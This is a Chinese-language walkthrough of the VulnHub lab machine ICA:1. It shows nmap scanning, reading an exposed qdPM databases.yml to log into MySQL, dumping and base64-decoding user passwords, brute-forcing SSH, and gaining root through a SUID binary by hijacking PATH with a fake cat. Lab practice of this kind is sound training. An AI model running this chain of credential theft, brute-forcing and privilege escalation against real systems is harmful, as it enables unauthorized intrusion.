vulnhub靶机ica：1

靶机地址：ICA: 1 ~ VulnHub

主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 -p- 192.168.21.136

nmap -sV -sT -O -p22,80,3306,33060 192.168.21.136

nmap --script=vuln -p22,80,3306,33060 192.168.21.136

只能去80

这是qdpm的架构

看一下这个怎么弄（csrf基本没有啥用）

下载databases.yml（直接访问就能）

Ok拿到密码

qdpmadmin

UcVQCMQk2STVeS6J

这个因该是数据库的账号

登入一下mysql

mysql -u qdpmadmin -h 192.168.21.136 -p

登陆成功

看一下数据库

show databases;

看到staff（员工）大差不差这里面有密码

查库就可以

use staff；

看看表

show tables;

先看login这里面密码可能性大一点

select * from login ;

这里找到密码了

那么用户名就在user表里面

select * from user;

哇感动，他甚至还写了权限

但是安全起见还是全保存一下，避免有问题

创建user和passwd文件

这里就是直接爆破ssh了

这里是base64加密，那么写个脚本吧

这里我就用readline的模式读取文件，再进行解密

import base64

f = open("passwd")

line = f.readline()

while line:

    print(line)

    print(base64.b64decode(line))

    line = f.readline()

f.close()

python 1.py|grep ^b\'[0-9,a-z,A-Z]*|sed 's/^.//'|cut -b 2-17

数据处理完成

直接写进去就可以

python 1.py|grep ^b\'[0-9,a-z,A-Z]*|sed 's/^.//'|cut -b 2-17>pass

小心占用

爆破ssh密码

发现一个问题user的用户名没有小写

不然不能出来

nmap -p 22 --script=ssh-brute --script-args userdb=user,passdb=pass 192.168.21.136

和后来发现nmap能用就用的nmap

看到有两个账号

dexter:7ZwV4qtg42cmUXGX - Valid credentials

travis:DJceVy98W28Y7wLg - Valid credentials

那就ssh登上去看一下

ssh [email protected]

Sudo -l没法用但是找到了这个

翻译：

在我看来，访问系统时存在弱点。

据我所知，可执行文件的内容是部分可见的。

我需要找出是否存在漏洞。

那么接下来就是提权了

先找有root权限的文件

find / -perm -u=s 2>/dev/null

/usr/bin一般没有什么问题

先看opt吧

好家伙，那应该就是这个文件了

strings get_access

为了了解程序的过程就用ida跑了一下

这里其实是查看了系统的文件/root/system.info

那我们需要将cat劫持一下，执行我们的cat

利用bash写个脚本（tmp里面）

echo '/bin/bash' > /tmp/cat

chmod +x /tmp/cat

echo $PATH

export PATH=/tmp:$PATH

/opt/get_access

搞定